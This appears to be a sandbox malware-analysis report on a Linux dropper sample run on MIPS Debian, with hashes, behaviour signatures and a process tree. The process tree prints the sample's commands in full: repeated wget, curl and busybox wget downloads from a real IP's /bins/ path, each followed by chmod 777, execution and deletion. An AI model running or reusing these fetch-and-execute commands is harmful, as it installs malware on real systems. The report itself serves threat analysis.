Analysis
-
max time kernel
66s -
max time network
120s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
09-11-2024 15:13
Static task
static1
Behavioral task
behavioral1
Sample
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
Resource
debian9-mipsel-20240729-en
General
-
Target
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
-
Size
10KB
-
MD5
8024f690eb7cff058a13d1d38f0b31c0
-
SHA1
c4be3a2eb04473145808dd1ce797dce7815d06dc
-
SHA256
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856
-
SHA512
9fa6258d021edb3a5423acb3c3d58dddad944e245b9f849a1f4ce16473b3976c29b7e07c4f171df4f4d8acd04988b6eba64c58a82ecf121b6c9756d10324ec9f
-
SSDEEP
192:+fEqq1c7X/8cm6S6m6W6D676ABfBga7X/8cI6S6m6W6D676wqqi:+fEqq1c7X/8c0BfBga7X/8cuqqi
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 889 chmod 925 chmod 931 chmod 955 chmod 979 chmod 745 chmod 808 chmod 856 chmod 895 chmod 901 chmod 907 chmod 937 chmod 943 chmod 819 chmod 862 chmod 783 chmod 985 chmod 949 chmod 961 chmod 967 chmod 973 chmod 754 chmod 913 chmod 883 chmod 919 chmod 877 chmod 848 chmod 871 chmod -
Executes dropped EXE 28 IoCs
Processes:
8ReStadMbCmEurUfQpyytOyHFmyODTgdGZpdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHKeFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEXLiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuoFQEOoM3X8lrwXw1WGkPq7AModrpioPpb3fF5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9HkgBUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5SlxAp23TLnMDOtEJaYDtSWAuowl8awe0aymJN62MA381JSNwxqMwQ7H88NQY12gs09PC5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvemwPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQQ2coityNz9jjImihquLcKzocOGf1iQj2twuAAzSaxso87KkFnZRciA1XNBvjhESxA4FXb2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuwwPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQQ2coityNz9jjImihquLcKzocOGf1iQj2twmJN62MA381JSNwxqMwQ7H88NQY12gs09PC5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvemuAAzSaxso87KkFnZRciA1XNBvjhESxA4FXb2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuweFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEXLiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo8ReStadMbCmEurUfQpyytOyHFmyODTgdGZpdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHKBUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ayFQEOoM3X8lrwXw1WGkPq7AModrpioPpb3fF5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkgioc pid process /tmp/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ 746 8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ /tmp/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK 756 pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK /tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX 784 eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX /tmp/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo 809 LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo /tmp/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f 820 FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f /tmp/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg 850 F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg /tmp/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 857 BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 /tmp/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay 863 SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay /tmp/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC 872 mJN62MA381JSNwxqMwQ7H88NQY12gs09PC /tmp/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem 878 5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem /tmp/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ 884 wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ /tmp/Q2coityNz9jjImihquLcKzocOGf1iQj2tw 890 Q2coityNz9jjImihquLcKzocOGf1iQj2tw /tmp/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX 896 uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX /tmp/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw 902 b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw /tmp/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ 908 wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ /tmp/Q2coityNz9jjImihquLcKzocOGf1iQj2tw 914 Q2coityNz9jjImihquLcKzocOGf1iQj2tw /tmp/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC 920 mJN62MA381JSNwxqMwQ7H88NQY12gs09PC /tmp/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem 926 5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem /tmp/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX 932 uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX /tmp/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw 938 b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw /tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX 944 eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX /tmp/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo 950 LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo /tmp/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ 956 8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ /tmp/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK 962 pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK /tmp/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 968 BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 /tmp/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay 974 SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay /tmp/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f 980 FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f /tmp/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg 986 F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg -
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for modification /tmp/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC curl File opened for modification /tmp/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw curl File opened for modification /tmp/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ curl File opened for modification /tmp/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 curl File opened for modification /tmp/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX curl File opened for modification /tmp/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ curl File opened for modification /tmp/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f curl File opened for modification /tmp/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ curl File opened for modification /tmp/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK curl File opened for modification /tmp/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX curl File opened for modification /tmp/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem curl File opened for modification /tmp/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK curl File opened for modification /tmp/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC curl File opened for modification /tmp/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo curl File opened for modification /tmp/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f curl File opened for modification /tmp/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 curl File opened for modification /tmp/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay curl File opened for modification /tmp/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg curl File opened for modification /tmp/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg curl File opened for modification /tmp/Q2coityNz9jjImihquLcKzocOGf1iQj2tw curl File opened for modification /tmp/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay curl File opened for modification /tmp/Q2coityNz9jjImihquLcKzocOGf1iQj2tw curl File opened for modification /tmp/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem curl File opened for modification /tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX curl File opened for modification /tmp/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo curl File opened for modification /tmp/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ curl File opened for modification /tmp/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw curl File opened for modification /tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX curl
Processes
-
/tmp/838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N/tmp/838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N1⤵PID:714
-
/bin/rm/bin/rm bins.sh2⤵PID:721
-
/usr/bin/wgetwget http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵PID:723
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:743 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵PID:744
-
/bin/chmodchmod 777 8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵
- File and Directory Permissions Modification
PID:745 -
/tmp/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ./8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵
- Executes dropped EXE
PID:746 -
/bin/rmrm 8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵PID:747
-
/usr/bin/wgetwget http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵PID:748
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:749 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵PID:750
-
/bin/chmodchmod 777 pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵
- File and Directory Permissions Modification
PID:754 -
/tmp/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK./pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵
- Executes dropped EXE
PID:756 -
/bin/rmrm pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵PID:759
-
/usr/bin/wgetwget http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵PID:760
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:767 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵PID:776
-
/bin/chmodchmod 777 eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵
- File and Directory Permissions Modification
PID:783 -
/tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX./eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵
- Executes dropped EXE
PID:784 -
/bin/rmrm eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵PID:787
-
/usr/bin/wgetwget http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵PID:789
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:800 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵PID:807
-
/bin/chmodchmod 777 LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵
- File and Directory Permissions Modification
PID:808 -
/tmp/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo./LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵
- Executes dropped EXE
PID:809 -
/bin/rmrm LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵PID:810
-
/usr/bin/wgetwget http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵PID:811
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:812 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵PID:813
-
/bin/chmodchmod 777 FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵
- File and Directory Permissions Modification
PID:819 -
/tmp/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f./FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵
- Executes dropped EXE
PID:820 -
/bin/rmrm FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵PID:823
-
/usr/bin/wgetwget http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵PID:825
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:832 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵PID:841
-
/bin/chmodchmod 777 F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵
- File and Directory Permissions Modification
PID:848 -
/tmp/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg./F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵
- Executes dropped EXE
PID:850 -
/bin/rmrm F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵PID:852
-
/usr/bin/wgetwget http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵PID:853
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:854 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵PID:855
-
/bin/chmodchmod 777 BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵
- File and Directory Permissions Modification
PID:856 -
/tmp/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5./BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵
- Executes dropped EXE
PID:857 -
/bin/rmrm BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵PID:858
-
/usr/bin/wgetwget http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵PID:859
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:860 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵PID:861
-
/bin/chmodchmod 777 SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵
- File and Directory Permissions Modification
PID:862 -
/tmp/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay./SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵
- Executes dropped EXE
PID:863 -
/bin/rmrm SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵PID:864
-
/usr/bin/wgetwget http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵PID:865
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:869 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵PID:870
-
/bin/chmodchmod 777 mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵
- File and Directory Permissions Modification
PID:871 -
/tmp/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC./mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵
- Executes dropped EXE
PID:872 -
/bin/rmrm mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵PID:873
-
/usr/bin/wgetwget http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵PID:874
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:875 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵PID:876
-
/bin/chmodchmod 777 5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵
- File and Directory Permissions Modification
PID:877 -
/tmp/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem./5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵
- Executes dropped EXE
PID:878 -
/bin/rmrm 5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵PID:879
-
/usr/bin/wgetwget http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵PID:880
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵PID:882
-
/bin/chmodchmod 777 wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵
- File and Directory Permissions Modification
PID:883 -
/tmp/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ./wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵
- Executes dropped EXE
PID:884 -
/bin/rmrm wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵PID:885
-
/usr/bin/wgetwget http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵PID:886
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵PID:888
-
/bin/chmodchmod 777 Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵
- File and Directory Permissions Modification
PID:889 -
/tmp/Q2coityNz9jjImihquLcKzocOGf1iQj2tw./Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵
- Executes dropped EXE
PID:890 -
/bin/rmrm Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵PID:891
-
/usr/bin/wgetwget http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵PID:892
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵PID:894
-
/bin/chmodchmod 777 uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵
- File and Directory Permissions Modification
PID:895 -
/tmp/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX./uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵
- Executes dropped EXE
PID:896 -
/bin/rmrm uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵PID:897
-
/usr/bin/wgetwget http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵PID:898
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵PID:900
-
/bin/chmodchmod 777 b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵
- File and Directory Permissions Modification
PID:901 -
/tmp/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw./b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵
- Executes dropped EXE
PID:902 -
/bin/rmrm b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵PID:903
-
/usr/bin/wgetwget http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵PID:904
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵PID:906
-
/bin/chmodchmod 777 wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵
- File and Directory Permissions Modification
PID:907 -
/tmp/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ./wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵
- Executes dropped EXE
PID:908 -
/bin/rmrm wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵PID:909
-
/usr/bin/wgetwget http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵PID:910
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵PID:912
-
/bin/chmodchmod 777 Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵
- File and Directory Permissions Modification
PID:913 -
/tmp/Q2coityNz9jjImihquLcKzocOGf1iQj2tw./Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵
- Executes dropped EXE
PID:914 -
/bin/rmrm Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵PID:915
-
/usr/bin/wgetwget http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵PID:916
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵PID:918
-
/bin/chmodchmod 777 mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵
- File and Directory Permissions Modification
PID:919 -
/tmp/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC./mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵
- Executes dropped EXE
PID:920 -
/bin/rmrm mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵PID:921
-
/usr/bin/wgetwget http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵PID:922
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵PID:924
-
/bin/chmodchmod 777 5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵
- File and Directory Permissions Modification
PID:925 -
/tmp/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem./5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵
- Executes dropped EXE
PID:926 -
/bin/rmrm 5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵PID:927
-
/usr/bin/wgetwget http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵PID:928
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵PID:930
-
/bin/chmodchmod 777 uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵
- File and Directory Permissions Modification
PID:931 -
/tmp/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX./uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵
- Executes dropped EXE
PID:932 -
/bin/rmrm uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵PID:933
-
/usr/bin/wgetwget http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵PID:934
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935 -
